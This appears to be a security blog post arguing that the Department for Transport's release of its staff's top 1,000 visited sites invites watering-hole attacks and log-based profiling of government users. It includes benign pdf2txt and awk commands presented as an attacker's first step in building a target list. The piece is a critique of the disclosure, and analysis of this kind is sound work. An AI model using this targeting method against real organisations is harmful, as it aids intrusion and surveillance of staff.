On July 29th the Department for Transport (DfT) released the list of their top 1,000 visited sites. Although there have been articles written about the list, mostly they seem to centralise on the sites themselves and the browsing habits of the civil servants within the department. However, it occurred to us that whilst released under the freedom of information act, the list itself does present a significant risk, not only to the DfT, but to other Government sites to which there is likely to be a strong correlation of browsing habits. Whether the list was edited before release is a subject of debate, but we would expect a degree of filtering to be applied in order to remove sensitive sites (although the four sites on the Government Secure Intranet (GSI) were retained).

The increased risk
There is an increased rate of technical attacks against Government systems, particularly using browser based or client side attacks. Knowing the browsing habits of your intended victims provides a potential attacker with a list of sites to target, and seed with malicious content. This approach would reduce the footprint within the target organisation of an attack. A typical approach first requires the user to navigate to a malicious site; this is ordinarily achieved through enticement or social engineering (embedded links or terms in a targeted email for example). However, by directly compromising sites this additional step and therefore log imprint at the target environment is avoided.

Seeding the target sites for an increased attack conversion rate is one use of the information. The servers themselves, and the logs they maintain, may also contain information which is useful to an attacker. For example, analysis of the logs contained on the published web servers, would likely reveal users who view the same content at work and at home. A work laptop or mobile device in the home environment can in some cases present a softer target for attack. If it's the same user on a different home machine, there is the potential for information gathering to inform more complex attacks against the Government department or to capture information stored outside the DfT network perimeter.

Taking the list to automation
So say an aggressor wanted to automate the analysis of these sites how hard would it be? In short not very, we can use the python PDF miner to extract the contents of the PDF as so:

pdf2txt.py -o output.txt f0007532-table.pdf

Tidy up the output a little to just get the hosts and remove some blank lines:

cat output.txt | awk 'NF {print $2}' | awk '$0!~/^$/ {print $0}' > tidy.txt

Result? A list of host names and IP addresses all tidied and ready for feeding into any automated analysis system. Looking for easy to exploit web application and server configuration vulnerabilities in the target sites. Given the number of sites, the range of material and the potential for vulnerabilities; the likelihood for accurate seeding of malicious content is significant.

Should the DfT have released the information? In our opinion, no. The value of the information in the public domain is relatively insignificant, beyond that of titillation of the reader (someone likes their expensive cars). The value to the attacking population is significant, both in the potential for increased accuracy of direct attacks, and in the availability of user specific data through the correlation of site access across multiple source addresses.